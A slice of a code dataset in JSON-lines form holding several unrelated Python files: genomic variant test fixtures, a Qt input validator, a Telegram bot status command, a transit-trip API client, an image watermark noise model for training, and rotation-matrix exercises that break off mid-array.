\"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"value\": 49531260, \"type\": \"Number\"},\n \"end\": {\"value\": 49531262, \"type\": \"Number\"},\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup1_38_cn(genomic_dup1_seq_loc):\n \"\"\"Create test fixture for copy number count dup1 on GRCh38\"\"\"\n return {\n \"type\": \"CopyNumberCount\",\n \"_id\": \"ga4gh:CN.wIUwSQ9MQdv-2dsoDo-RjI97iK3Mn5m6\",\n \"subject\": genomic_dup1_seq_loc,\n \"copies\": {\"type\": \"Number\", \"value\": 3}\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup2_seq_loc():\n \"\"\"Create genomic dup2 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.4mH68huylkPmu6zyUwH4wiazIYr9cQUX\",\n \"sequence_id\": \"ga4gh:SQ.yC_0RBj3fgBlvgyAuycbzdubtLxq-rE0\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"value\": 2087937, \"type\": \"Number\"},\n \"end\": {\"value\": 2087948, \"type\": \"Number\"},\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup2_38_cn(genomic_dup2_seq_loc):\n \"\"\"Create test fixture for copy number count dup2 on GRCh38\"\"\"\n return {\n \"type\": \"CopyNumberCount\",\n \"_id\": \"ga4gh:CN.2ByO6IxnL3qVjpFfMBUzPHa45NW1JNJy\",\n \"subject\": genomic_dup2_seq_loc,\n \"copies\": {\"type\": \"Number\", \"value\": 3}\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del3_dup3_loc():\n \"\"\"Create genomic del3 dup3 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.DgEMxYt1AdPe-HZAQbT2AVz5OejICnOj\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"min\": 31060226,\n \"max\": 31100350,\n \"type\": \"DefiniteRange\"\n },\n \"end\": {\n \"min\": 33274279,\n \"max\": 33417152,\n \"type\": \"DefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup4_loc():\n \"\"\"Create genomic dup4 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.us51izImAQQWr-Hu6Q7HQm-vYvmb-jJo\",\n \"sequence_id\": \"ga4gh:SQ.-A1QmD_MatoqxvgVxBLZTONHz9-c7nQo\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 30417575,\n \"comparator\": \"<=\",\n \"type\": \"IndefiniteRange\"\n },\n \"end\": {\n \"value\": 31394018,\n \"comparator\": \">=\",\n \"type\": \"IndefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup5_loc():\n \"\"\"Create genomic dup5 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.k2FXLyqyS8pbtZxEHCpNd2SHD6iCtH9C\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 154021811,\n \"comparator\": \"<=\",\n \"type\": \"IndefiniteRange\"\n },\n \"end\": {\n \"value\": 154092209,\n \"type\": \"Number\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_dup6_loc():\n \"\"\"Create genomic dup6 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.h0_xXu36uSnPEuLoxvVmTAFQCS1ZFuLN\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 154021811,\n \"type\": \"Number\"\n },\n \"end\": {\n \"value\": 154092209,\n \"comparator\": \">=\",\n \"type\": \"IndefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del1_seq_loc():\n \"\"\"Create genomic del1 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.Yg5B66zErDjK9Lqeaw-kuzAB9w5-uUaS\",\n \"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"value\": 10149810, \"type\": \"Number\"},\n \"end\": {\"value\": 10149811, \"type\": \"Number\"},\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del1_38_cn(genomic_del1_seq_loc):\n \"\"\"Create test fixture for copy number count del1 on GRCh38\"\"\"\n return {\n \"type\": \"CopyNumberCount\",\n \"_id\": \"ga4gh:CN.ms5s89_fFM9tcIzgPhs_Bvj-2m8TRZFh\",\n \"subject\": genomic_del1_seq_loc,\n \"copies\": {\"type\": \"Number\", \"value\": 1}\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del2_seq_loc():\n \"\"\"Create genomic del2 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.lksYAhEQvP8biy_nxoOJ_Zwu75a_kYtQ\",\n \"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"value\": 10146594, \"type\": \"Number\"},\n \"end\": {\"value\": 10146613, \"type\": \"Number\"},\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del2_38_cn(genomic_del2_seq_loc):\n \"\"\"Create test fixture for copy number count del1 on GRCh38\"\"\"\n return {\n \"type\": \"CopyNumberCount\",\n \"_id\": \"ga4gh:CN.sO2So0Kj3-Op_1XTRrs2vW9JQ7lcYL30\",\n \"subject\": genomic_del2_seq_loc,\n \"copies\": {\"type\": \"Number\", \"value\": 1}\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del4_seq_loc():\n \"\"\"Create genomic del4 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.7OJ5EFgu_2C4zPFDUBgn-ziE6BZwsRcv\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 31120495,\n \"comparator\": \"<=\",\n \"type\": \"IndefiniteRange\"\n },\n \"end\": {\n \"value\": 33339477,\n \"comparator\": \">=\",\n \"type\": \"IndefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del5_seq_loc():\n \"\"\"Create genomic del5 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.jURzcCBf3kJVx19uuJJtwt78LuBbtfwD\",\n \"sequence_id\": \"ga4gh:SQ.w0WZEvgJF0zf_P4yyTzjjv9oW1z61HHP\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 18575353,\n \"comparator\": \"<=\",\n \"type\": \"IndefiniteRange\"\n },\n \"end\": {\n \"value\": 18653629,\n \"type\": \"Number\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef genomic_del6_seq_loc():\n \"\"\"Create genomic del6 sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.TPwsB5ymsNI7TynTlI8_8CI_NmNrBHUQ\",\n \"sequence_id\": \"ga4gh:SQ.0iKlIQk2oZLoeOG9P1riRU6hvL5Ux8TV\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\n \"value\": 133462763,\n \"type\": \"Number\"\n },\n \"end\": {\n \"value\": 133464858,\n \"comparator\": \">=\",\n \"type\": \"IndefiniteRange\"\n }\n },\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef grch38_genomic_insertion_seq_loc():\n \"\"\"Create test fixture for GRCh38 genomic insertion seq location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.fJ80Ab9JP0GXtDNeEaoDxE35tlI-k9Cd\",\n \"interval\": {\n \"end\": {\"value\": 39724743, \"type\": \"Number\"},\n \"start\": {\"value\": 39724731, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"type\": \"SequenceLocation\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef grch38_genomic_insertion_variation(grch38_genomic_insertion_seq_loc):\n \"\"\"Create a test fixture for NC_000017.10:g.37880993_37880994insGCTTACGTGATG\"\"\"\n return {\n \"_id\": \"ga4gh:VA.tCjV190dUsV7tSjdR8qOLSQIR7Hr8VMe\",\n \"location\": grch38_genomic_insertion_seq_loc,\n \"state\": {\n \"sequence\": \"TACGTGATGGCTTACGTGATGGCT\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_amplification(braf_ncbi_seq_loc, braf_gene_context):\n \"\"\"Create test fixture for BRAF Amplification\"\"\"\n _id = \"ga4gh:CX.TZBOQe5xFojvFJ1XjQQD0633rStHtGUs\"\n params = {\n \"id\": \"normalize.variation:BRAF%20Amplification\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": _id,\n \"variation\": {\n \"_id\": _id,\n \"subject\": braf_ncbi_seq_loc,\n \"copy_change\": \"efo:0030072\",\n \"type\": \"CopyNumberChange\"\n },\n \"molecule_context\": \"genomic\",\n \"structural_type\": \"SO:0001880\",\n \"gene_context\": braf_gene_context\n }\n return VariationDescriptor(**params)\n\n\n@pytest.fixture(scope=\"session\")\ndef prpf8_amplification(prpf8_ncbi_seq_loc, prpf8_gene_context):\n \"\"\"Create test fixture for PRPF8 Amplification\"\"\"\n _id = \"ga4gh:CX.UD9c0niZWqC5vDSkFUGkMAdwWcZOHV32\"\n params = {\n \"id\": \"normalize.variation:PRPF8%20AMPLIFICATION\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": _id,\n \"variation\": {\n \"_id\": _id,\n \"subject\": prpf8_ncbi_seq_loc,\n \"copy_change\": \"efo:0030072\",\n \"type\": \"CopyNumberChange\"\n },\n \"molecule_context\": \"genomic\",\n \"structural_type\": \"SO:0001880\",\n \"gene_context\": prpf8_gene_context\n }\n return VariationDescriptor(**params)\n\n\ndef assertion_checks(normalize_response, test_variation, label, ignore_id=False):\n \"\"\"Check that normalize_response and test_variation are equal.\"\"\"\n if not ignore_id:\n assert normalize_response.id == test_variation.id, \"id\"\n assert normalize_response.label == label\n assert normalize_response.type == test_variation.type, \"type\"\n assert normalize_response.variation_id == \\\n test_variation.variation_id, \"variation_id\"\n if test_variation.variation.type != \"Text\":\n if test_variation.variation.id:\n assert normalize_response.variation.id == \\\n test_variation.variation.id, \"variation._id\"\n if test_variation.variation_id:\n assert normalize_response.variation_id == \\\n normalize_response.variation.id, \"variation_id == variation.id\" # noqa: E501\n assert normalize_response.variation == \\\n test_variation.variation, \"variation\"\n else:\n if not ignore_id:\n assert normalize_response.variation.id == \\\n test_variation.variation.id\n assert normalize_response.variation.type == \\\n test_variation.variation.type\n assert normalize_response.variation.definition == \\\n test_variation.variation.definition\n assert normalize_response.molecule_context == \\\n test_variation.molecule_context, \"molecule_context\"\n assert normalize_response.structural_type == \\\n test_variation.structural_type, \"structural_type\"\n assert normalize_response.vrs_ref_allele_seq == \\\n test_variation.vrs_ref_allele_seq, \"vrs_ref_allele_seq\"\n\n resp_gene_context = normalize_response.gene_context\n test_variation_context = test_variation.gene_context\n if resp_gene_context:\n if not ignore_id:\n assert resp_gene_context.id == test_variation_context.id, \"gene_context.id\"\n assert resp_gene_context.label == \\\n test_variation_context.label, \"gene_context.label\"\n assert resp_gene_context.gene_id ==\\\n test_variation_context.gene_id, \"gene_context.gene_id\"\n assert set(resp_gene_context.xrefs) ==\\\n set(test_variation_context.xrefs), \"gene_context.xrefs\"\n if test_variation_context.alternate_labels:\n assert set(resp_gene_context.alternate_labels) == \\\n set(test_variation_context.alternate_labels), \"gene_context.alternate_labels\" # noqa: E501\n assert len(resp_gene_context.extensions) == \\\n len(test_variation_context.extensions), \"len gene_context.extensions\"\n for resp_ext in resp_gene_context.extensions:\n for test_var in test_variation_context.extensions:\n if resp_ext.name == test_var.name:\n if resp_ext.name == \"chromosome_location\":\n assert resp_ext.value == test_var.value, \\\n \"gene_context.chromosome_location\"\n elif resp_ext.name == \"associated_with\":\n assert set(resp_ext.value) == set(test_var.value), \\\n \"gene_context.associated_with\"\n else:\n if isinstance(test_var.value, list) and isinstance(test_var.value[0], str): # noqa: E501\n assert set(resp_ext.value) == set(test_var.value), \\\n f\"gene_context.{resp_ext.name}\"\n else:\n assert resp_ext.value == test_var.value,\\\n f\"gene_context.{resp_ext.name}\"\n else:\n assert not test_variation_context\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":44103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"255449061","text":"# ccsi_int_validator.py\nfrom PySide.QtGui import QMessageBox\n\n\nclass CCSIIntValidator(object):\n def __init__(self, lower=1, upper=10, name=\"\"):\n self._lower = lower\n self._upper = upper\n self._name = name\n self._msgbox = False\n\n @property\n def lower(self):\n return self._lower\n\n @lower.setter\n def lower(self, lower):\n self._lower = lower\n\n @property\n def upper(self):\n return self._upper\n\n @upper.setter\n def upper(self, upper):\n self._upper = upper\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, name):\n self._name = name\n\n def validate(self, text_input, parent=None):\n if self._msgbox:\n return False\n if len(text_input) == 0:\n if len(self._name):\n msg = \"The input for {0} is empty! Please enter a number between {1} and {2}\".format(self._name, self._lower, self._upper)\n else:\n msg = \"The input is empty! Please enter a number between {0} and {1}\".format(self._lower, self._upper)\n self._msgbox = True\n QMessageBox.warning(parent, \"Warning\", msg)\n self._msgbox = False\n return False\n try:\n num = int(text_input)\n except ValueError:\n if len(self._name):\n msg = \"Invalid input for {0}! Please enter a number between {1} and {2}\".format(self._name, self._lower, self._upper)\n else:\n msg = \"Invalid input! Please enter a number between {0} and {1}\".format(self._lower, self._upper)\n self._msgbox = True\n QMessageBox.warning(parent, \"Warning\", msg)\n self._msgbox = False\n return False\n\n if num < self._lower:\n if len(self._name):\n msg = \"Invalid input for {0}! Please enter a number greater or equal to {1}\".format(self._name, self._lower)\n else:\n msg = \"Invalid input! Please enter a number greater or equal to {0}\".format(self._lower)\n self._msgbox = True\n QMessageBox.warning(parent, \"Warning\", msg)\n self._msgbox = False\n return False\n elif num > self._upper:\n if len(self._name):\n msg = \"Invalid input for {0}! Please enter a number less or equal to {1}\".format(self._name, self._upper)\n else:\n msg = \"Invalid input! Please enter a number less or equal to {0}\".format(self._upper)\n self._msgbox = True\n QMessageBox.warning(parent, \"Warning\", msg)\n self._msgbox = False\n return False\n else:\n return True\n","sub_path":"gui/ccsi_int_validator.py","file_name":"ccsi_int_validator.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"19009135","text":"from .. import BotzHub\nfrom telethon import events, Button\n\n@BotzHub.on(events.NewMessage(incoming=True, pattern=\"/alive\"))\nasync def alibe(event):\n SMEX_PIC = \"https://telegra.ph/file/4d29d5d9c99f4aee314ea.jpg\"\n but = [[Button.url(\"Mʏ ᴍᴀsᴛᴇʀ »»\", \"t.me/HATER_GONA_HATE\")]]\n pm_caption = \"•**I'M ALIVE AND READY TO SMEX**\\n\\n\"\n pm_caption += \"•**Mʏ sʏsᴛᴇᴍ ɪs ᴘᴇʀғᴇᴄᴛʟʏ ʀᴜɴɴɪɢ**\\n\\n\"\n pm_caption += \"• Aʙᴏᴜᴛ ᴍʏ sʏsᴛᴇᴍ ✗\\n\\n\"\n pm_caption += \"• 𝙎𝙈𝙀𝙓 𝙓 𝙑𝙀𝙍𝙎𝙄𝙊𝙉: 1.1\\n\"\n pm_caption += \"• 𝙏𝙀𝙇𝙀𝙏𝙃𝙊𝙉 𝙑𝙀𝙍𝙎𝙄𝙊𝙉 ☞ {version.__version__}\\n\"\n pm_caption += (\n \"• 𝘾𝙊𝙋𝙔𝙍𝙄𝙂𝙃𝙏 𝘽𝙔 ☞ [╰☆☆ਪੰਡਤ ²⁰⁰²☆☆╮『🇨🇦』](t.me/HATER_GONA_HATE)\\n\\n\"\n )\n pm_caption += f\"• 𝘾𝙍𝙀𝘼𝙏𝙊𝙍 ☞ [╰☆☆ਪੰਡਤ ²⁰⁰²☆☆╮『🇨🇦』](t.me/HATER_GONA_HATE)\\n\"\n await BotzHub.send_file(event. chat_id, file=SMEX_PIC, captions=pm_caption, buttons=but, link_preview=False)\n","sub_path":"TelethonBot/plugins/alive.py","file_name":"alive.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"572206234","text":"\r\ndef string_parser(data, option=None):\r\n result = []\r\n data = data.replace(\" \", \"\")\r\n if option is not None:\r\n temp = data.split(\",\")\r\n agent_a = int(temp[0][1:])\r\n agent_b = int(temp[1])\r\n data = str.join(\",\", temp[2:])\r\n temp = data[1:]\r\n else:\r\n temp = data[2:]\r\n\r\n temp = temp[:len(temp)-2]\r\n for i in temp.split(\"],[\"):\r\n temp_list = []\r\n for j in i.split(\",\"):\r\n temp_list.append(int(j))\r\n result.append(temp_list)\r\n\r\n if option is not None:\r\n return agent_a, agent_b, result\r\n else:\r\n return result\r\n\r\n\r\ndef json_parser(_log_file):\r\n json_list = {}\r\n i = 0\r\n while True:\r\n temp_list = {}\r\n line = _log_file.readline()\r\n line = line.rstrip('\\n')\r\n\r\n if not line:\r\n break\r\n\r\n line_list = line.split(\"|\")\r\n temp_list['Time'] = line_list[0]\r\n temp_list['Cmd'] = line_list[1]\r\n temp_list['From'] = line_list[2]\r\n temp_list['To'] = line_list[3]\r\n temp_list['Msg'] = line_list[4]\r\n\r\n json_list[i] = temp_list\r\n i += 1\r\n\r\n return json_list\r\n","sub_path":"Util/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"519889088","text":"# transport.py\n# writen by Jan-Niklas Dihlmann\n# Load xmltodict\n# python3 -m pip install xmltodict\n\nimport requests\nimport xmltodict\n\nclass Transport(object):\n\n def __init__(self):\n self.origin = ''\n self.destination = ''\n\n\n def request_stop(self, stop_name):\n parameter = {\n 'stateless': 1,\n 'coordOutputFormat': 'NBWT',\n 'coordListOutputFormat': 'STRING',\n 'coordOutputFormatTail': 0,\n 'locationServerActiv': 1,\n 'name_sf': stop_name,\n 'type_sf': 'any',\n 'naldoSugMacro': True}\n\n url = 'http://efa-bw.de/ios_naldo/XML_STOPFINDER_REQUEST'\n response = requests.get(url, params=parameter)\n response_xml = response.text\n response_dic = xmltodict.parse(response_xml)\n response_arr = response_dic['efa']['sf']['p']\n\n for stop in response_arr:\n print(stop['n'], stop['ty'], stop['r']['stateless'])\n\n\n def request_trip(self):\n parameter = {\n 'stateless': 1,\n 'coordOutputFormat': 'NBWT',\n 'coordListOutputFormat': 'STRING',\n 'coordOutputFormatTail': 0,\n 'locationServerActive': 1,\n 'imparedOptionsActive': 1,\n 'itOptionsActive': 1,\n 'changeSpeed': 'normal',\n 'trITMOTvalue100': 10,\n 'useProxFootSearch': 1,\n 'ptOptionsActive': 1,\n 'routeType': 'LEASTTIME', # Change Time ??\n 'lineRestriction': 400,\n 'useRealtime': 1, # Change Time ??\n 'calcNumberOfTrips': 4, # Trip Count \n 'name_origin': self.origin,\n 'type_origin': 'any',\n 'name_destination': self.destination,\n 'type_destination': 'any'\n }\n\n url = 'http://efa-bw.de/ios_naldo/XML_TRIP_REQUEST2'\n response = requests.get(url, params=parameter)\n response_xml = response.text\n response_dic = xmltodict.parse(response_xml)\n response_arr = response_dic['efa']['ts']['tp']\n #print(response_arr)\n for trip in response_arr:\n print('----------------------------------')\n #print(trip)\n #print(trip['ls'][''])\n for trip_stop in trip['ls']['l']:\n\n\n\n\n\n\n\n\n\n trip_stop_point = trip_stop['ps']['p']\n #print(trip_stop_point[1]['dt']['t'])\n\n print(trip_stop_point[0]['dt']['t'], trip_stop_point[0]['n'], 'Linie: ' + str(trip_stop['m']['nu']), trip_stop_point[1]['dt']['t'], trip_stop_point[1]['n'])\n #print(response_arr)\n\n\n\ntransport = Transport()\ntransport.origin = '8010054' # Schwärzlocherstr. 111\ntransport.destination = '8010212' # BG Unfallklinik\ntransport.request_trip()\n","sub_path":"classes/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"377954619","text":"import argparse\nimport string\nimport random\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport os\n\n#logo = [\"mark_rewrite__Lucky_M.png\", \"mark_rewrite_aoi_bhinn.png\", \"mark_rewrite_BadTaste.png\", \"mark_rewrite_GO_Hank.png\", \"mark_rewrite_mamnunticha.png\"]\n#logo = [\"mark_rewrite__Lucky_M.png\"]\nnum_logo = 0\nfor r, dirs, files in os.walk('./dataset/mark_logo_ran_new'):\n # Get all the images\n for file in files:\n num_logo += 1\n\n\ndef get_noise_model(noise_type=\"gaussian,0,50\"):\n tokens = noise_type.split(sep=\",\")\n\n if tokens[0] == \"gaussian\":\n min_stddev = int(tokens[1])\n max_stddev = int(tokens[2])\n\n def gaussian_noise(img):\n noise_img = img.astype(np.float)\n stddev = np.random.uniform(min_stddev, max_stddev)\n noise = np.random.randn(*img.shape) * stddev\n noise_img += noise\n noise_img = np.clip(noise_img, 0, 255).astype(np.uint8)\n return noise_img\n return gaussian_noise\n elif tokens[0] == \"clean\":\n def add_text_clean(img):\n img = img.copy()\n #image = Image.fromarray(img)\n #image = image.resize((128,128))\n return img\n return add_text_clean\n #return lambda img: img\n elif tokens[0] == \"text\":\n min_occupancy = int(tokens[1])\n max_occupancy = int(tokens[2])\n\n def add_text(img):\n img = img.copy()\n\n TRANSPARENCY = random.randint(88, 97)\n\n logo_ran = random.randint(1, num_logo)\n bigger = random.uniform(1.31, 2)\n\n\n\n image = Image.fromarray(img)\n\n watermark = Image.open('./dataset/mark_logo_ran_new/mark_rewrite_{}.png'.format(logo_ran))\n hei = watermark.size[1]\n wid = watermark.size[0]\n\n watermark = watermark.resize((int(wid / bigger), int(hei / bigger)))\n\n hei = watermark.size[1]\n wid = watermark.size[0]\n\n\n if watermark.mode!='RGBA':\n print(\"in if\")\n alpha = Image.new('L', watermark.size, 255)\n watermark.putalpha(alpha)\n\n\n paste_mask = watermark.split()[3].point(lambda i: i * TRANSPARENCY / 100.)\n\n hei_i = image.size[1]\n wid_i = image.size[0]\n\n #random_W = random.randint(0, wid_i - wid)\n #random_H = random.randint(0, hei_i - hei)\n\n #image = image.resize((128,128))\n #image.paste(watermark, (128 - wid, 128 - hei), mask= paste_mask)\n\n #if hei_i < wid_i:\n # image = image.resize((500, 375))\n # image.paste(watermark, (500 - wid, 375 - hei), mask=paste_mask)\n #else:\n # image = image.resize((375, 500))\n # image.paste(watermark, (375 - hei, 500 - wid), mask=paste_mask)\n #print(\"size\")\n #print(wid_i, hei_i)\n\n image.paste(watermark, (wid_i - wid , hei_i - hei), mask=paste_mask)\n #image.paste(watermark, (100 , 100 ), mask=paste_mask)\n #print(np.shape(image))\n #return img #测试时��注释这一行 启用48行\n return image #训练模型时请注释这一行 启用47行\n\n return add_text\n elif tokens[0] == \"impulse\":\n min_occupancy = int(tokens[1])\n max_occupancy = int(tokens[2])\n\n def add_impulse_noise(img):\n occupancy = np.random.uniform(min_occupancy, max_occupancy)\n mask = np.random.binomial(size=img.shape, n=1, p=occupancy / 100)\n noise = np.random.randint(256, size=img.shape)\n img = img * (1 - mask) + noise * mask\n return img.astype(np.uint8)\n return add_impulse_noise\n else:\n raise ValueError(\"noise_type should be 'gaussian', 'clean', 'text', or 'impulse'\")\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description=\"test noise model\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--image_size\", type=int, default=256,\n help=\"training patch size\")\n parser.add_argument(\"--noise_model\", type=str, default=\"gaussian,0,50\",\n help=\"noise model to be tested\")\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = get_args()\n image_size = args.image_size\n noise_model = get_noise_model(args.noise_model)\n\n while True:\n image = np.ones((image_size, image_size, 3), dtype=np.uint8) * 128\n noisy_image = noise_model(image)\n cv2.imshow(\"noise image\", noisy_image)\n key = cv2.waitKey(-1)\n\n # \"q\": quit\n if key == 113:\n return 0\n\n\nif __name__ == '__main__':\n main()","sub_path":"noise_model.py","file_name":"noise_model.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556939560","text":"import numpy as np\n\n\ndef transform2D(dx,dy,R):\n T = np.array([ [ R[0,0] , R[0,1] , dx ],\n [\tR[1,0] , R[1,1] , dy ],\n [\t0.0\t ,\t0.0\t , 1.0 ]]);\n return T;\n\n# Rotation about x axis\ndef rotX(angle):\n m = np.array([ [\t1.0, \t\t0.0\t , 0.0 ],\n [\t0.0, np.cos(angle), -np.sin(angle)],\n [\t0.0, np.sin(angle), np.cos(angle)]]);\n return m;\n\n\n# Rotation about y axis\ndef rotY(angle):\n m = np.array([ [ np.cos(angle), 0.0, np.sin(angle)],\n [ 0.0\t\t , 1.0, \t0.0\t\t ],\n [-np.sin(angle), 0.0, np.cos(angle)]]);\n return m;\n\n# Rotation about z axis\ndef rotZ(angle):\n m = np.array([ [np.cos(angle), -np.sin(angle), 0.0],\n [np.sin(angle), np.cos(angle), 0.0],\n [ 0.0\t\t , \t\t0.0\t\t , 1.0]]);\n return m\n\n\n# convert rotation matrix to normalized quaternion\ndef M2Q(rot):\n m00 = rot[0,0]\n m01 = rot[0,1]\n m02 = rot[0,2]\n m10 = rot[1,0]\n m11 = rot[1,1]\n m12 = rot[1,2]\n m20 = rot[2,0]\n m21 = rot[2,1]\n m22 = rot[2,2]\n\n qw = np.sqrt(1 + m00 + m11 + m22)/2.0\n qx = (m21 - m12)/(4*qw)\n qy = (m02 - m20)/(4*qw)\n qz = (m10 - m01)/(4*qw)\n\n return np.array([qw, qx, qy, qz])\n\ndef q1(idMat):\n print(\"Q1:\")\n print(\"WTA: \")\n move1 = transform2D(2, 0, idMat)\n print(move1)\n print(\"ATB: \")\n ang = rotZ(np.radians(45))\n move2 = transform2D(0, 0, ang)\n print(move2)\n print(\"BTC\")\n move3 = transform2D(.5, 0, idMat)\n print(move3)\n print(\"CTD\")\n ang = rotZ(np.radians(-30))\n move4 = transform2D(0, 0, ang)\n print(move4)\n print(\"DTE\")\n move5 = transform2D(.25, 0, idMat)\n print(move5)\n print(\"WTE\")\n endval = np.dot(np.dot(np.dot(move1, move2), np.dot(move3, move4)), move5)\n print(endval)\n\ndef q2(idMat):\n print(\"Q2:\")\n print(\"WTR: \")\n ang = rotZ(np.pi/6)\n move1 = transform2D(3.5, -.25, ang)\n print(move1)\n print(\"RTL: \")\n ang = rotZ(np.pi/10)\n move2 = transform2D(0.1, 0.0, ang)\n print(move2)\n print(\"LTO: \")\n move3 = transform2D(0.5, 0.0, idMat)\n print(move3)\n print(\"WTO: \")\n endval = np.dot(np.dot(move1, move2), move3)\n print(endval)\n\ndef q3help(num, ang, xyz):\n print()\n print(num, \".)\")\n print(\"Rotation Matrix: \")\n\n if xyz == \"x\":\n rotmat = rotX(ang)\n print(rotmat)\n print(\"Quaternion: \")\n print(M2Q(rotmat))\n\n elif xyz == \"y\":\n rotmat = rotY(ang)\n print(rotmat)\n print(\"Quaternion: \")\n print(M2Q(rotmat))\n\n else:\n if xyz == \"z\":\n rotmat = rotZ(ang)\n print(rotmat)\n print(\"Quaternion: \")\n print(M2Q(rotmat))\n\n\ndef q3(idMat):\n print(\"Q3:\")\n q3help(\"a\", 0, \"z\")\n q3help(\"b\", np.pi / 2, \"x\")\n q3help(\"c\", np.pi / 2, \"y\")\n q3help(\"d\", np.pi / 2, \"z\")\n q3help(\"e\", np.pi / 3, \"x\")\n q3help(\"f\", np.pi / 3, \"y\")\n q3help(\"g\", np.pi / 3, \"z\")\n q3help(\"h\", np.pi / 4, \"x\")\n q3help(\"i\", np.pi / 4, \"y\")\n q3help(\"j\", np.pi / 4, \"z\")\n q3help(\"k\", np.pi / 6, \"x\")\n q3help(\"l\", np.pi / 6, \"y\")\n q3help(\"m\", np.pi / 6, \"z\")\n q3help(\"n\", -np.pi / 3, \"x\")\n q3help(\"o\", -np.pi / 3, \"y\")\n q3help(\"p\", -np.pi / 3, \"z\")\n q3help(\"q\", -np.pi / 6, \"x\")\n q3help(\"r\", -np.pi / 6, \"y\")\n q3help(\"s\", -np.pi / 6, \"z\")\n\n\ndef q4():\n print(\"Q4:\")\n m = np.array([[0.747, 